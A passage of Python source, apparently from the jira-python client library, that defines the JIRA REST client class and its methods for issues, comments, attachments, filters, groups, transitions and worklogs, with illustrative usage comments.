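#   jira.assign_issue(issue, 'admin')      # Issue object is translated to 'ABC-123'
#   jira.assign_issue('ABC-123', 'admin')  # equivalent call with the plain key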
class ResultList(list):
def __init__(self, iterable=None, _total=None):
if iterable is not None:
list.__init__(self, iterable)
else:
list.__init__(self)
self.total = _total if _total is not None else len(self)
class QshGenerator:
def __init__(self, context_path):
self.context_path = context_path
def __call__(self, req):
parse_result = urlparse(req.url)
path = parse_result.path[len(self.context_path):] if len(self.context_path) > 1 else parse_result.path
query = '&'.join(sorted(parse_result.query.split("&")))
qsh = '%(method)s&%(path)s&%(query)s' % {'method': req.method.upper(), 'path': path, 'query': query}
return hashlib.sha256(qsh).hexdigest()
class JIRA(object):
"""
User interface to JIRA.
Clients interact with JIRA by constructing an instance of this object and calling its methods. For addressable
resources in JIRA -- those with "self" links -- an appropriate subclass of :py:class:`Resource` will be returned
with customized ``update()`` and ``delete()`` methods, along with attribute access to fields. This means that calls
of the form ``issue.fields.summary`` will be resolved into the proper lookups to return the JSON value at that
mapping. Methods that do not return resources will return a dict constructed from the JSON response or a scalar
value; see each method's documentation for details on what that method returns.
"""
DEFAULT_OPTIONS = {
"server": "http://localhost:2990/jira",
"context_path": "/",
"rest_path": "api",
"rest_api_version": "2",
"verify": True,
"resilient": True,
"async": False,
"client_cert": None,
"check_update": True,
"headers": {
'X-Atlassian-Token': 'no-check',
'Cache-Control': 'no-cache',
# 'Accept': 'application/json;charset=UTF-8', # default for REST
'Content-Type': 'application/json', # ;charset=UTF-8',
# 'Accept': 'application/json', # default for REST
#'Pragma': 'no-cache',
#'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT'
}
}
checked_version = False
JIRA_BASE_URL = '{server}/rest/api/{rest_api_version}/{path}'
AGILE_BASE_URL = '{server}/rest/greenhopper/1.0/{path}'
def __init__(self, server=None, options=None, basic_auth=None, oauth=None, jwt=None,
validate=False, get_server_info=True, async=False, logging=True, max_retries=3):
"""
Construct a JIRA client instance.
Without any arguments, this client will connect anonymously to the JIRA instance
started by the Atlassian Plugin SDK from one of the 'atlas-run', ``atlas-debug``,
or ``atlas-run-standalone`` commands. By default, this instance runs at
``http://localhost:2990/jira``. The ``options`` argument can be used to set the JIRA instance to use.
Authentication is handled with the ``basic_auth`` argument. If authentication is supplied (and is
accepted by JIRA), the client will remember it for subsequent requests.
For quick command line access to a server, see the ``jirashell`` script included with this distribution.
The easiest way to instantiate is using j = JIRA("https://jira.atlasian.com")
:param options: Specify the server and properties this client will use. Use a dict with any
of the following properties:
* server -- the server address and context path to use. Defaults to ``http://localhost:2990/jira``.
* rest_path -- the root REST path to use. Defaults to ``api``, where the JIRA REST resources live.
* rest_api_version -- the version of the REST resources under rest_path to use. Defaults to ``2``.
* verify -- Verify SSL certs. Defaults to ``True``.
* client_cert -- a tuple of (cert,key) for the requests library for client side SSL
:param basic_auth: A tuple of username and password to use when establishing a session via HTTP BASIC
authentication.
:param oauth: A dict of properties for OAuth authentication. The following properties are required:
* access_token -- OAuth access token for the user
* access_token_secret -- OAuth access token secret to sign with the key
* consumer_key -- key of the OAuth application link defined in JIRA
* key_cert -- private key file to sign requests with (should be the pair of the public key supplied to
JIRA in the OAuth application link)
:param jwt: A dict of properties for JWT authentication supported by Atlassian Connect. The following
properties are required:
* secret -- shared secret as delivered during 'installed' lifecycle event
(see https://developer.atlassian.com/static/connect/docs/latest/modules/lifecycle.html for details)
* payload -- dict of fields to be inserted in the JWT payload, e.g. 'iss'
Example jwt structure: ``{'secret': SHARED_SECRET, 'payload': {'iss': PLUGIN_KEY}}``
        :param validate: If true it will validate your credentials first. Remember that if you are accessing JIRA
            as anonymous it will fail to instantiate.
:param get_server_info: If true it will fetch server version info first to determine if some API calls
are available.
:param async: To enable async requests for those actions where we implemented it, like issue update() or delete().
Obviously this means that you cannot rely on the return code when this is enabled.
"""
if options is None:
options = {}
if server and hasattr(server, 'keys'):
warnings.warn(
"Old API usage, use JIRA(url) or JIRA(options={'server': url}, when using dictionary always use named parameters.",
DeprecationWarning)
options = server
server = None
if server:
options['server'] = server
if async:
options['async'] = async
self.logging = logging
self._options = copy.copy(JIRA.DEFAULT_OPTIONS)
self._options.update(options)
self._rank = None
# Rip off trailing slash since all urls depend on that
if self._options['server'].endswith('/'):
self._options['server'] = self._options['server'][:-1]
context_path = urlparse(self._options['server']).path
if len(context_path) > 0:
self._options['context_path'] = context_path
self._try_magic()
if oauth:
self._create_oauth_session(oauth)
elif basic_auth:
self._create_http_basic_session(*basic_auth)
self._session.headers.update(self._options['headers'])
elif jwt:
self._create_jwt_session(jwt)
else:
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.headers.update(self._options['headers'])
self._session.max_retries = max_retries
if validate:
# This will raise an Exception if you are not allowed to login.
# It's better to fail faster than later.
self.session()
if get_server_info:
# We need version in order to know what API calls are available or not
si = self.server_info()
try:
self._version = tuple(si['versionNumbers'])
except Exception as e:
globals()['logging'].error("invalid server_info: %s", si)
raise e
else:
self._version = (0, 0, 0)
if self._options['check_update'] and not JIRA.checked_version:
self._check_update_()
JIRA.checked_version = True
# TODO: check if this works with non-admin accounts
self._fields = {}
for f in self.fields():
if 'clauseNames' in f:
for name in f['clauseNames']:
self._fields[name] = f['id']
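
    # Illustrative ways of constructing a client, based on the parameters documented
    # above; the server URL and credentials are placeholders, not real values:
    #
    #   jira = JIRA('https://jira.example.com')                            # anonymous
    #   jira = JIRA('https://jira.example.com', basic_auth=('user', 'password'))
    #   jira = JIRA(options={'server': 'https://jira.example.com', 'verify': False})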
def _check_update_(self):
# check if the current version of the library is outdated
try:
data = requests.get("http://pypi.python.org/pypi/jira/json", timeout=2.001).json()
released_version = data['info']['version']
if released_version > __version__:
warnings.warn("You are running an outdated version of JIRA Python %s. Current version is %s. Do not file any bugs against older versions." % (
__version__, released_version))
except requests.RequestException:
pass
except Exception as e:
logging.warning(e)
def __del__(self):
session = getattr(self, "_session", None)
if session is not None:
if sys.version_info < (3, 4, 0): # workaround for https://github.com/kennethreitz/requests/issues/2303
session.close()
def _check_for_html_error(self, content):
# TODO: Make it return errors when content is a webpage with errors
        # JIRA has the bad habit of returning errors in pages with 200 and
# embedding the error in a huge webpage.
if '<!-- SecurityTokenMissing -->' in content:
logging.warning("Got SecurityTokenMissing")
raise JIRAError("SecurityTokenMissing: %s" % content)
return False
return True
# Information about this client
def client_info(self):
"""Get the server this client is connected to."""
return self._options['server']
# Universal resource loading
def find(self, resource_format, ids=None):
"""
Get a Resource object for any addressable resource on the server.
This method is a universal resource locator for any RESTful resource in JIRA. The
argument ``resource_format`` is a string of the form ``resource``, ``resource/{0}``,
``resource/{0}/sub``, ``resource/{0}/sub/{1}``, etc. The format placeholders will be
populated from the ``ids`` argument if present. The existing authentication session
will be used.
The return value is an untyped Resource object, which will not support specialized
:py:meth:`.Resource.update` or :py:meth:`.Resource.delete` behavior. Moreover, it will
not know to return an issue Resource if the client uses the resource issue path. For this
reason, it is intended to support resources that are not included in the standard
Atlassian REST API.
:param resource_format: the subpath to the resource string
:param ids: values to substitute in the ``resource_format`` string
:type ids: tuple or None
"""
resource = Resource(resource_format, self._options, self._session)
resource.find(ids)
return resource
def async_do(self, size=10):
"""
This will execute all async jobs and wait for them to finish. By default it will run on 10 threads.
size: number of threads to run on.
:return:
"""
if hasattr(self._session, '_async_jobs'):
logging.info("Executing async %s jobs found in queue by using %s threads..." % (
len(self._session._async_jobs), size))
threaded_requests.map(self._session._async_jobs, size=size)
# Application properties
# non-resource
def application_properties(self, key=None):
"""
Return the mutable server application properties.
:param key: the single property to return a value for
"""
params = {}
if key is not None:
params['key'] = key
return self._get_json('application-properties', params=params)
def set_application_property(self, key, value):
"""
Set the application property.
:param key: key of the property to set
:param value: value to assign to the property
"""
url = self._options['server'] + \
'/rest/api/2/application-properties/' + key
payload = {
'id': key,
'value': value
}
r = self._session.put(
url, data=json.dumps(payload))
def applicationlinks(self, cached=True):
"""
List of application links
:return: json
"""
# if cached, return the last result
if cached and hasattr(self, '_applicationlinks'):
return self._applicationlinks
# url = self._options['server'] + '/rest/applinks/latest/applicationlink'
url = self._options['server'] + \
'/rest/applinks/latest/listApplicationlinks'
r = self._session.get(url)
o = json_loads(r)
if 'list' in o:
self._applicationlinks = o['list']
else:
self._applicationlinks = []
return self._applicationlinks
# Attachments
def attachment(self, id):
"""Get an attachment Resource from the server for the specified ID."""
return self._find_for_resource(Attachment, id)
# non-resource
def attachment_meta(self):
"""Get the attachment metadata."""
return self._get_json('attachment/meta')
@translate_resource_args
def add_attachment(self, issue, attachment, filename=None):
"""
Attach an attachment to an issue and returns a Resource for it.
The client will *not* attempt to open or validate the attachment; it expects a file-like object to be ready
for its use. The user is still responsible for tidying up (e.g., closing the file, killing the socket, etc.)
:param issue: the issue to attach the attachment to
:param attachment: file-like object to attach to the issue, also works if it is a string with the filename.
:param filename: optional name for the attached file. If omitted, the file object's ``name`` attribute
            is used. If you acquired the file-like object by any other method than ``open()``, make sure
that a name is specified in one way or the other.
:rtype: an Attachment Resource
"""
if isinstance(attachment, string_types):
attachment = open(attachment, "rb")
if hasattr(attachment, 'read') and hasattr(attachment, 'mode') and attachment.mode != 'rb':
logging.warning(
"%s was not opened in 'rb' mode, attaching file may fail." % attachment.name)
# TODO: Support attaching multiple files at once?
url = self._get_url('issue/' + str(issue) + '/attachments')
fname = filename
if not fname:
fname = os.path.basename(attachment.name)
if 'MultipartEncoder' not in globals():
method = 'old'
r = self._session.post(
url,
files={
'file': (fname, attachment, 'application/octet-stream')},
headers=CaseInsensitiveDict({'content-type': None, 'X-Atlassian-Token': 'nocheck'}))
else:
method = 'MultipartEncoder'
def file_stream():
return MultipartEncoder(
fields={
'file': (fname, attachment, 'application/octet-stream')}
)
m = file_stream()
r = self._session.post(
url, data=m, headers=CaseInsensitiveDict({'content-type': m.content_type, 'X-Atlassian-Token': 'nocheck'}), retry_data=file_stream)
attachment = Attachment(self._options, self._session, json_loads(r)[0])
if attachment.size == 0:
raise JIRAError("Added empty attachment via %s method?!: r: %s\nattachment: %s" % (method, r, attachment))
return attachment
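
    # Hypothetical usage of add_attachment(); the issue key and file path below are
    # placeholders only:
    #
    #   jira.add_attachment('ABC-123', '/tmp/report.pdf')
    #   with open('/tmp/report.pdf', 'rb') as f:
    #       jira.add_attachment('ABC-123', f, filename='weekly-report.pdf')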
# Components
def component(self, id):
"""
Get a component Resource from the server.
:param id: ID of the component to get
"""
return self._find_for_resource(Component, id)
@translate_resource_args
def create_component(self, name, project, description=None, leadUserName=None, assigneeType=None,
isAssigneeTypeValid=False):
"""
Create a component inside a project and return a Resource for it.
:param name: name of the component
:param project: key of the project to create the component in
:param description: a description of the component
:param leadUserName: the username of the user responsible for this component
:param assigneeType: see the ComponentBean.AssigneeType class for valid values
:param isAssigneeTypeValid: boolean specifying whether the assignee type is acceptable
"""
data = {
'name': name,
'project': project,
'isAssigneeTypeValid': isAssigneeTypeValid
}
if description is not None:
data['description'] = description
if leadUserName is not None:
data['leadUserName'] = leadUserName
if assigneeType is not None:
data['assigneeType'] = assigneeType
url = self._get_url('component')
r = self._session.post(
url, data=json.dumps(data))
component = Component(self._options, self._session, raw=json_loads(r))
return component
def component_count_related_issues(self, id):
"""
Get the count of related issues for a component.
:type id: integer
:param id: ID of the component to use
"""
return self._get_json('component/' + id + '/relatedIssueCounts')['issueCount']
# Custom field options
def custom_field_option(self, id):
"""
Get a custom field option Resource from the server.
:param id: ID of the custom field to use
"""
return self._find_for_resource(CustomFieldOption, id)
# Dashboards
def dashboards(self, filter=None, startAt=0, maxResults=20):
"""
Return a ResultList of Dashboard resources and a ``total`` count.
:param filter: either "favourite" or "my", the type of dashboards to return
:param startAt: index of the first dashboard to return
:param maxResults: maximum number of dashboards to return. The total number of
results is always available in the ``total`` attribute of the returned ResultList.
"""
params = {}
if filter is not None:
params['filter'] = filter
params['startAt'] = startAt
params['maxResults'] = maxResults
r_json = self._get_json('dashboard', params=params)
dashboards = [Dashboard(self._options, self._session, raw_dash_json)
for raw_dash_json in r_json['dashboards']]
return ResultList(dashboards, r_json['total'])
def dashboard(self, id):
"""
Get a dashboard Resource from the server.
:param id: ID of the dashboard to get.
"""
return self._find_for_resource(Dashboard, id)
# Fields
# non-resource
def fields(self):
"""Return a list of all issue fields."""
return self._get_json('field')
# Filters
def filter(self, id):
"""
Get a filter Resource from the server.
:param id: ID of the filter to get.
"""
return self._find_for_resource(Filter, id)
def favourite_filters(self):
"""Get a list of filter Resources which are the favourites of the currently authenticated user."""
r_json = self._get_json('filter/favourite')
filters = [Filter(self._options, self._session, raw_filter_json)
for raw_filter_json in r_json]
return filters
def create_filter(self, name=None, description=None,
jql=None, favourite=None):
"""
Create a new filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
data = {}
if name is not None:
data['name'] = name
if description is not None:
data['description'] = description
if jql is not None:
data['jql'] = jql
if favourite is not None:
data['favourite'] = favourite
url = self._get_url('filter')
r = self._session.post(
url, data=json.dumps(data))
raw_filter_json = json_loads(r)
return Filter(self._options, self._session, raw=raw_filter_json)
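
    # Illustrative call (the filter name, description and JQL are placeholders):
    #
    #   new_filter = jira.create_filter(
    #       name='My open bugs',
    #       description='Bugs assigned to me that are still open',
    #       jql='assignee = currentUser() AND resolution = Unresolved',
    #       favourite=True)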
def update_filter(self, filter_id,
name=None, description=None,
jql=None, favourite=None):
"""
Updates a filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
filter = self.filter(filter_id)
data = {}
data['name'] = name or filter.name
data['description'] = description or filter.description
data['jql'] = jql or filter.jql
data['favourite'] = favourite or filter.favourite
url = self._get_url('filter/%s' % filter_id)
r = self._session.put(url, headers={'content-type': 'application/json'},
data=json.dumps(data))
raw_filter_json = json.loads(r.text)
return Filter(self._options, self._session, raw=raw_filter_json)
# Groups
# non-resource
def groups(self, query=None, exclude=None, maxResults=9999):
"""
Return a list of groups matching the specified criteria.
Keyword arguments:
query -- filter groups by name with this string
exclude -- filter out groups by name with this string
maxResults -- maximum results to return. defaults to 9999
"""
params = {}
groups = []
if query is not None:
params['query'] = query
if exclude is not None:
params['exclude'] = exclude
if maxResults is not None:
params['maxResults'] = maxResults
for group in self._get_json('groups/picker', params=params)['groups']:
groups.append(group['name'])
return sorted(groups)
def group_members(self, group):
"""
Return a hash or users with their information. Requires JIRA 6.0 or will raise NotImplemented.
"""
if self._version < (6, 0, 0):
raise NotImplementedError(
"Group members is not implemented in JIRA before version 6.0, upgrade the instance, if possible.")
params = {'groupname': group, 'expand': "users"}
r = self._get_json('group', params=params)
size = r['users']['size']
end_index = r['users']['end-index']
while end_index < size - 1:
params = {'groupname': group, 'expand': "users[%s:%s]" % (
end_index + 1, end_index + 50)}
r2 = self._get_json('group', params=params)
for user in r2['users']['items']:
r['users']['items'].append(user)
end_index = r2['users']['end-index']
size = r['users']['size']
result = {}
for user in r['users']['items']:
result[user['name']] = {'fullname': user['displayName'], 'email': user['emailAddress'],
'active': user['active']}
return result
def add_group(self, groupname):
'''
Creates a new group in JIRA.
:param groupname: The name of the group you wish to create.
        :return: Boolean - True if successful.
'''
url = self._options['server'] + '/rest/api/latest/group'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['name'] = groupname
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def remove_group(self, groupname):
'''
Deletes a group from the JIRA instance.
:param groupname: The group to be deleted from the JIRA instance.
:return: Boolean. Returns True on success.
'''
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
url = self._options['server'] + '/rest/api/latest/group'
x = {'groupname': groupname}
self._session.delete(url, params=x)
return True
# Issues
def issue(self, id, fields=None, expand=None):
"""
Get an issue Resource from the server.
:param id: ID or key of the issue to get
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# this allows us to pass Issue objects to issue()
if type(id) == Issue:
return id
issue = Issue(self._options, self._session)
params = {}
if fields is not None:
params['fields'] = fields
if expand is not None:
params['expand'] = expand
issue.find(id, params=params)
return issue
def create_issue(self, fields=None, prefetch=True, **fieldargs):
"""
Create a new issue and return an issue Resource for it.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored.
By default, the client will immediately reload the issue Resource created by this method in order to return
a complete Issue object to the caller; this behavior can be controlled through the 'prefetch' argument.
JIRA projects may contain many different issue types. Some issue screens have different requirements for
fields in a new issue. This information is available through the 'createmeta' method. Further examples are
available here: https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+Example+-+Create+Issue
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
:param prefetch: whether to reload the created issue Resource so that all of its data is present in the value\
returned from this method
"""
data = {}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
p = data['fields']['project']
if isinstance(p, string_types) or isinstance(p, integer_types):
data['fields']['project'] = {'id': self.project(p).id}
url = self._get_url('issue')
r = self._session.post(url, data=json.dumps(data))
raw_issue_json = json_loads(r)
if 'key' not in raw_issue_json:
raise JIRAError(r.status_code, request=r)
if prefetch:
return self.issue(raw_issue_json['key'])
else:
return Issue(self._options, self._session, raw=raw_issue_json)
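
    # Illustrative call; the project key, issue type and texts are placeholders:
    #
    #   issue = jira.create_issue(fields={
    #       'project': {'key': 'ABC'},
    #       'summary': 'Example summary',
    #       'description': 'Example description',
    #       'issuetype': {'name': 'Bug'},
    #   })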
def createmeta(self, projectKeys=None, projectIds=[], issuetypeIds=None, issuetypeNames=None, expand=None):
"""
Gets the metadata required to create issues, optionally filtered by projects and issue types.
:param projectKeys: keys of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectIds.
:param projectIds: IDs of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectKeys.
:param issuetypeIds: IDs of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeNames.
:param issuetypeNames: Names of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeIds.
:param expand: extra information to fetch inside each resource.
"""
params = {}
if projectKeys is not None:
params['projectKeys'] = projectKeys
if projectIds is not None:
if isinstance(projectIds, string_types):
projectIds = projectIds.split(',')
params['projectIds'] = projectIds
if issuetypeIds is not None:
params['issuetypeIds'] = issuetypeIds
if issuetypeNames is not None:
params['issuetypeNames'] = issuetypeNames
if expand is not None:
params['expand'] = expand
return self._get_json('issue/createmeta', params)
# non-resource
@translate_resource_args
def assign_issue(self, issue, assignee):
"""
Assign an issue to a user. None will set it to unassigned. -1 will set it to Automatic.
:param issue: the issue to assign
:param assignee: the user to assign the issue to
"""
url = self._options['server'] + \
'/rest/api/2/issue/' + str(issue) + '/assignee'
payload = {'name': assignee}
r = self._session.put(
url, data=json.dumps(payload))
@translate_resource_args
def comments(self, issue):
"""
Get a list of comment Resources.
:param issue: the issue to get comments from
"""
r_json = self._get_json('issue/' + str(issue) + '/comment')
comments = [Comment(self._options, self._session, raw_comment_json)
for raw_comment_json in r_json['comments']]
return comments
@translate_resource_args
def comment(self, issue, comment):
"""
Get a comment Resource from the server for the specified ID.
:param issue: ID or key of the issue to get the comment from
:param comment: ID of the comment to get
"""
return self._find_for_resource(Comment, (issue, comment))
@translate_resource_args
def add_comment(self, issue, body, visibility=None):
"""
Add a comment from the current authenticated user on the specified issue and return a Resource for it.
The issue identifier and comment body are required.
:param issue: ID or key of the issue to add the comment to
:param body: Text of the comment to add
:param visibility: a dict containing two entries: "type" and "value". "type" is 'role' (or 'group' if the JIRA\
server has configured comment visibility for groups) and 'value' is the name of the role (or group) to which\
viewing of this comment will be restricted.
"""
data = {
'body': body
}
if visibility is not None:
data['visibility'] = visibility
url = self._get_url('issue/' + str(issue) + '/comment')
r = self._session.post(
url, data=json.dumps(data))
comment = Comment(self._options, self._session, raw=json_loads(r))
return comment
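
    # Hypothetical usage showing the visibility dict described above
    # ('Administrators' is a placeholder role name):
    #
    #   jira.add_comment('ABC-123', 'Restricted note',
    #                    visibility={'type': 'role', 'value': 'Administrators'})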
# non-resource
@translate_resource_args
def editmeta(self, issue):
"""
Get the edit metadata for an issue.
:param issue: the issue to get metadata for
"""
return self._get_json('issue/' + str(issue) + '/editmeta')
@translate_resource_args
def remote_links(self, issue):
"""
Get a list of remote link Resources from an issue.
:param issue: the issue to get remote links from
"""
r_json = self._get_json('issue/' + str(issue) + '/remotelink')
remote_links = [RemoteLink(
self._options, self._session, raw_remotelink_json) for raw_remotelink_json in r_json]
return remote_links
@translate_resource_args
def remote_link(self, issue, id):
"""
Get a remote link Resource from the server.
:param issue: the issue holding the remote link
:param id: ID of the remote link
"""
return self._find_for_resource(RemoteLink, (issue, id))
# removed the @translate_resource_args because it prevents us from finding
# information for building a proper link
def add_remote_link(self, issue, destination, globalId=None, application=None, relationship=None):
"""
Add a remote link from an issue to an external application and returns a remote link Resource
for it. ``object`` should be a dict containing at least ``url`` to the linked external URL and
``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` and the keyword arguments ``globalId``, ``application``
and ``relationship``, see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param destination: the link details to add (see the above link for details)
:param globalId: unique ID for the link (see the above link for details)
:param application: application information for the link (see the above link for details)
:param relationship: relationship description for the link (see the above link for details)
"""
warnings.warn(
"broken: see https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551",
Warning)
try:
applicationlinks = self.applicationlinks()
except JIRAError as e:
applicationlinks = []
# In many (if not most) configurations, non-admin users are
# not allowed to list applicationlinks; if we aren't allowed,
# let's let people try to add remote links anyway, we just
# won't be able to be quite as helpful.
warnings.warn(
"Unable to gather applicationlinks; you will not be able "
"to add links to remote issues: (%s) %s" % (
e.status_code,
e.text
),
Warning
)
data = {}
if type(destination) == Issue:
data['object'] = {
'title': str(destination),
'url': destination.permalink()
}
for x in applicationlinks:
if x['application']['displayUrl'] == destination._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
if 'globalId' not in data:
raise NotImplementedError(
"Unable to identify the issue to link to.")
else:
if globalId is not None:
data['globalId'] = globalId
if application is not None:
data['application'] = application
data['object'] = destination
if relationship is not None:
data['relationship'] = relationship
# check if the link comes from one of the configured application links
for x in applicationlinks:
if x['application']['displayUrl'] == self._options['server']:
data['globalId'] = "appId=%s&issueId=%s" % (
x['application']['id'], destination.raw['id'])
data['application'] = {
'name': x['application']['name'], 'type': "com.atlassian.jira"}
break
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
remote_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return remote_link
def add_simple_link(self, issue, object):
"""
Add a simple remote link from an issue to web resource. This avoids the admin access problems from add_remote_link by just using a simple object and presuming all fields are correct and not requiring more complex ``application`` data.
``object`` should be a dict containing at least ``url`` to the linked external URL
and ``title`` to display for the link inside JIRA.
For definitions of the allowable fields for ``object`` , see https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+for+Remote+Issue+Links.
:param issue: the issue to add the remote link to
:param object: the dictionary used to create remotelink data
"""
data = {}
# hard code data dict to be passed as ``object`` to avoid any permissions errors
data = object
url = self._get_url('issue/' + str(issue) + '/remotelink')
r = self._session.post(
url, data=json.dumps(data))
simple_link = RemoteLink(
self._options, self._session, raw=json_loads(r))
return simple_link
# non-resource
@translate_resource_args
def transitions(self, issue, id=None, expand=None):
"""
Get a list of the transitions available on the specified issue to the current user.
:param issue: ID or key of the issue to get the transitions from
:param id: if present, get only the transition matching this ID
:param expand: extra information to fetch inside each transition
"""
params = {}
if id is not None:
params['transitionId'] = id
if expand is not None:
params['expand'] = expand
return self._get_json('issue/' + str(issue) + '/transitions', params=params)['transitions']
def find_transitionid_by_name(self, issue, transition_name):
"""
Get a transitionid available on the specified issue to the current user.
Look at https://developer.atlassian.com/static/rest/jira/6.1.html#d2e1074 for json reference
:param issue: ID or key of the issue to get the transitions from
:param trans_name: iname of transition we are looking for
"""
transitions_json = self.transitions(issue)
id = None
for transition in transitions_json:
if transition["name"].lower() == transition_name.lower():
id = transition["id"]
break
return id
@translate_resource_args
def transition_issue(self, issue, transition, fields=None, comment=None, **fieldargs):
# TODO: Support update verbs (same as issue.update())
"""
Perform a transition on an issue.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored. Field values will be set on the issue as part of the transition process.
:param issue: ID or key of the issue to perform the transition on
:param transition: ID or name of the transition to perform
:param comment: *Optional* String to add as comment to the issue when performing the transition.
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
"""
transitionId = None
try:
transitionId = int(transition)
except:
# cannot cast to int, so try to find transitionId by name
transitionId = self.find_transitionid_by_name(issue, transition)
if transitionId is None:
raise JIRAError("Invalid transition name. %s" % transition)
data = {
'transition': {
'id': transitionId
}
}
if comment:
data['update'] = {'comment': [{'add': {'body': comment}}]}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
url = self._get_url('issue/' + str(issue) + '/transitions')
r = self._session.post(
url, data=json.dumps(data))
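
    # Illustrative calls (issue key, transition name and field values are placeholders):
    #
    #   jira.transition_issue('ABC-123', 'Resolve Issue', comment='Fixed in build 42',
    #                         fields={'resolution': {'name': 'Fixed'}})
    #   jira.transition_issue('ABC-123', 5)   # transitions can also be given by ID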
@translate_resource_args
def votes(self, issue):
"""
Get a votes Resource from the server.
:param issue: ID or key of the issue to get the votes for
"""
return self._find_for_resource(Votes, issue)
@translate_resource_args
def add_vote(self, issue):
"""
Register a vote for the current authenticated user on an issue.
:param issue: ID or key of the issue to vote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
r = self._session.post(url)
@translate_resource_args
def remove_vote(self, issue):
"""
Remove the current authenticated user's vote from an issue.
:param issue: ID or key of the issue to unvote on
"""
url = self._get_url('issue/' + str(issue) + '/votes')
self._session.delete(url)
@translate_resource_args
def watchers(self, issue):
"""
Get a watchers Resource from the server for an issue.
:param issue: ID or key of the issue to get the watchers for
"""
return self._find_for_resource(Watchers, issue)
@translate_resource_args
def add_watcher(self, issue, watcher):
"""
Add a user to an issue's watchers list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to add to the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
self._session.post(
url, data=json.dumps(watcher))
@translate_resource_args
def remove_watcher(self, issue, watcher):
"""
Remove a user from an issue's watch list.
:param issue: ID or key of the issue affected
:param watcher: username of the user to remove from the watchers list
"""
url = self._get_url('issue/' + str(issue) + '/watchers')
params = {'username': watcher}
result = self._session.delete(url, params=params)
return result
@translate_resource_args
def worklogs(self, issue):
"""
Get a list of worklog Resources from the server for an issue.
:param issue: ID or key of the issue to get worklogs from
"""
r_json = self._get_json('issue/' + str(issue) + '/worklog')
worklogs = [Worklog(self._options, self._session, raw_worklog_json)
for raw_worklog_json in r_json['worklogs']]
return worklogs
@translate_resource_args
def worklog(self, issue, id):
"""
Get a specific worklog Resource from the server.
:param issue: ID or key of the issue to get the worklog from
:param id: ID of the worklog to get
"""
return self._find_for_resource(Worklog, (issue, id))
@translate_resource_args
def add_worklog(self, issue, timeSpent=None, timeSpentSeconds=None, adjustEstimate=None,
newEstimate=None, reduceBy=None, comment=None, started=None, user=None):
"""
Add a new worklog entry on an issue and return a Resource for it.
:param issue: the issue to add the worklog to
        :param timeSpent: a worklog entry with this amount of time spent, e.g. "2d"
        :param timeSpentSeconds: the amount of time spent, in seconds
:param adjustEstimate: (optional) allows the user to provide specific instructions to update the remaining\
time estimate of the issue. The value can either be ``new``, ``leave``, ``manual`` or ``auto`` (default).
:param newEstimate: the new value for the remaining estimate field. e.g. "2d"
:param reduceBy: the amount to reduce the remaining estimate by e.g. "2d"
        :param started: a datetime for when the work was logged; if not specified, defaults to now
:param comment: optional worklog comment
"""
params = {}
if adjustEstimate is not None:
params['adjustEstimate'] = adjustEstimate
if newEstimate is not None:
params['newEstimate'] = newEstimate
if reduceBy is not None:
params['reduceBy'] = reduceBy
data = {}
if timeSpent is not None:
data['timeSpent'] = timeSpent
if timeSpentSeconds is not None:
data['timeSpentSeconds'] = timeSpentSeconds
if comment is not None:
data['comment'] = comment
elif user:
            # log the user in the comment field, since the author fields are not always honored
data['comment'] = user
if started is not None:
# based on REST Browser it needs: "2014-06-03T08:21:01.273+0000"
data['started'] = started.strftime("%Y-%m-%dT%H:%M:%S.000%z")
if user is not None:
data['author'] = {"name": user,
'self': self.JIRA_BASE_URL + '/rest/api/2/user?username=' + user,
'displayName': user,
'active': False
}
data['updateAuthor'] = data['author']
# TODO: report bug to Atlassian: author and updateAuthor parameters are
# ignored.
url = self._get_url('issue/{0}/worklog'.format(issue))
r = self._session.post(url, params=params, data=json.dumps(data))
return Worklog(self._options, self._session, json_loads(r))
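    # Usage sketch (illustrative only): assuming an authenticated client `jira`
    # and an issue 'TEST-1', logging two hours of work while manually reducing
    # the remaining estimate could look like:
    #
    #   jira.add_worklog('TEST-1', timeSpent='2h', comment='code review',
    #                    adjustEstimate='manual', reduceBy='2h')
    #
    # The issue key and values are assumptions for the example.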
# Issue links
@translate_resource_args
